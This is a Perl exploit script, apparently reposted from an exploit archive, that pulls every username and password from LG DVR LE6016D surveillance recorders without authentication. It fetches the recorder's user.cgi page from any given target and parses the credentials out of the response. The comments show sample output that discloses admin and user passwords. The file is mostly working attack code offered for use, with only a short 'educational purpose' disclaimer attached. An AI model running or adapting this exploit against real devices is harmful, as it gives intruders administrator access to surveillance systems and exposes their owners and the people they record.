LG DVR LE6016D - Unauthenticated Remote Users/Passwords Disclosure Exploit

#!/usr/bin/perl
#
#              LG DVR LE6016D unauthenticated remote
#               users/passwords disclosure exploit
#
#
#                Copyright 2015 (c) Todor Donev
#                  <todor.donev at gmail.com>
#                http://www.ethical-hacker.org/
####
#
#  Digital video recorder (DVR) surveillance is the use of cameras,
#  often hidden or concealed, that use DVR technology to record
#  video for playback or immediate viewing. As technological
#  innovations have made improvements in the security and
#  surveillance industry, DVR surveillance has become more
#  prominent and allows for easier and more versatile security
#  systems in homes and businesses. A DVR surveillance security
#  system can be designed for indoor use or outdoor use and can
#  often involve hidden security cameras, concealed “nanny cams”
#  for home security, and even personal recording devices hidden
#  on a person.
#
####
#
#  Description:
#  No authentication (login) is required to exploit this vulnerability.
#  This program demonstrates how unpatched security bug would enable
#  hackers to gain control of a vulnerable device while sitting
#  behind their keyboard, potentially thousands of miles away.
#  An unauthenticated attacker that is connected to the DVR's may be
#  able to retrieve the device's administrator password allowing them
#  to directly access the device's configuration control panel.
#
####
#
#  Disclaimer:
#  This or previous programs is for Educational purpose ONLY. Do not
#  use it without permission.The usual disclaimer applies, especially
#  the fact that Todor Donev is not liable for any damages caused by
#  direct or indirect use of the information or functionality provided
#  by these programs. The author or any Internet provider bears NO
#  responsibility for content or misuse of these programs or any
#  derivatives thereof. By using these programs you accept the fact
#  that any damage (dataloss, system crash, system compromise, etc.)
#  caused by the use of these programs is not Todor Donev's
#  responsibility.
#
####
#                Use them at your own risk!
####
#
#         $ perl lg.pl 133.7.133.7:80
#            LG DVR LE6016D unauthenticated remote
#              users/passwords disclosure exploit
#                    u/p: admin/000000
#                    u/p: user1/000000
#                    u/p: user2/000000
#                    u/p: user3/000000
#                    u/p: LOGOUT/000000
#               Copyright 2015 (c) Todor Donev
#                 <todor.donev at gmail.com>
#               http://www.ethical-hacker.org/
#
####
  
use LWP::Simple;
print "   LG DVR LE6016D unauthenticated remote\n     users/passwords disclosure exploit\n";
if (@ARGV == 0) {&usg; &foot;}
while (@ARGV > 0) {
$t = shift(@ARGV);
}
my $r = get("http://$t/dvr/wwwroot/user.cgi") or die("Error $!");
for (my $i=0; $i <= 4; $i++){
if  ($r =~ m/<name>(.*)<\/name>/g){
print "           u\/p: $1\/";
}
if  ($r =~ m/<pw>(.*)<\/pw>/g){
print "$1\n";
}
}
&foot;
sub usg(){
print "\n Usage: perl $0 <target:port>\n Example: perl $0 133.7.133.7:80\n\n";
}
sub foot(){
print "      Copyright 2015 (c) Todor Donev\n        <todor.donev at gmail.com>\n";
print "      http://www.ethical-hacker.org/\n";
exit;
}

#  0day.today [2018-01-02]  #